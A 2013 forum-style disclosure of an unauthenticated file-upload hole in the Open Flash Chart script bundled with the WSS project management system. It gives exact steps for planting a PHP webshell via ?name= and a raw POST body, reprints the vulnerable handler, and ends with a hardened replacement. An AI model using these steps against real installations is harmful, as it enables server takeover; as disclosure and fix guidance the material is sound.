WSS Project Management System: POST to get shell

Original poster, posted on 2013-2-23 12:38:58
The vulnerable file takes POST data and saves it as a file with an arbitrary extension.

Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php   (hfy.php is the file name)

POST arbitrary data

Saved to: http://localhost/chart/tmp-upload-images/hfy.php

The vulnerable file is present in the latest version of WSS, even in the paid edition; the demo deployed on the Sina app store has it too.
<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*

print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/
// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

// world-writable directory created on demand, no authentication anywhere in this script
if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
// basename() only strips directory components; the extension comes straight from ?name=
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

// sink: the raw request body is written verbatim to the attacker-chosen file name
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
//

// everything below is unreachable because of the exit() above

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}

?>

Fix:
This vulnerable file is just a disaster. To fix it, add a permission check, extension validation and the like; do it yourself.
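The post leaves the fix as an exercise. Below is an added example of a hardened replacement for ofc_upload_image.php; it is not code from WSS or from Open Flash Chart. It assumes the application marks a logged-in user with $_SESSION['user_id'] (an assumed name), that ../tmp-upload-images/ already exists, and that the web server does not execute PHP from that directory. The request from the post (GET name=hfy.php with an arbitrary POST body) is rejected at three separate points: no session, the body is not a PNG, and the client never chooses the file name.

```php
<?php
// Hardened replacement for /chart/php-ofc-library/ofc_upload_image.php.
// Added example, not code from WSS or Open Flash Chart. Assumes the
// application marks a logged-in user with $_SESSION['user_id'] (assumed
// name) and that ../tmp-upload-images/ exists and is served with PHP
// execution disabled (e.g. "php_flag engine off" in an .htaccess).
session_start();
header('Content-Type: text/plain');

function reject(int $status, string $msg): void
{
    http_response_code($status);
    exit($msg);
}

// 1. Authentication: the original handler accepted requests from anyone.
if (empty($_SESSION['user_id'])) {
    reject(403, 'login required');
}

// 2. OFC's save_image posts the raw PNG body; accept nothing else.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    reject(405, 'POST only');
}
$raw = file_get_contents('php://input'); // $HTTP_RAW_POST_DATA was removed in PHP 7
$maxBytes = 2 * 1024 * 1024;
if ($raw === false || $raw === '' || strlen($raw) > $maxBytes) {
    reject(400, 'empty or oversized body');
}

// 3. Validate the content, not the name: the body must decode as a PNG.
//    A PHP script renamed to .png fails here; a real PNG with PHP hidden
//    in a text chunk still gets a .png name, so the PHP handler never
//    runs it (absent an unrelated local file inclusion bug).
$info = @getimagesizefromstring($raw);
if ($info === false || $info[2] !== IMAGETYPE_PNG) {
    reject(400, 'body is not a PNG image');
}

// 4. The client-supplied ?name= never reaches the filesystem. The original
//    used basename($_GET['name']), which strips ../ but happily writes
//    hfy.php. Generate the name server-side and force the .png extension.
$dir = realpath(__DIR__ . '/../tmp-upload-images');
if ($dir === false || !is_dir($dir) || !is_writable($dir)) {
    reject(500, 'upload directory unavailable');
}
$name = bin2hex(random_bytes(16)) . '.png';
$dest = $dir . DIRECTORY_SEPARATOR . $name;

// 5. Exclusive create ('x') so an existing file is never overwritten, then
//    a non-executable mode instead of the original mkdir(..., 0777).
$fh = fopen($dest, 'x');
if ($fh === false) {
    reject(500, 'could not create file');
}
fwrite($fh, $raw);
fclose($fh);
chmod($dest, 0644);

echo 'Saved as ' . $name;
```

Because the server now picks the file name, the calling JavaScript has to read the name back from the response instead of assuming the one it sent in ?name=. If the application really must keep a caller-chosen name, restrict it with a strict allowlist such as a regular expression for letters, digits, underscores and a single .png suffix, and still run the PNG content check; an extension blocklist alone is not enough, since the web server may map other extensions (.phtml, .php5 and so on) to PHP.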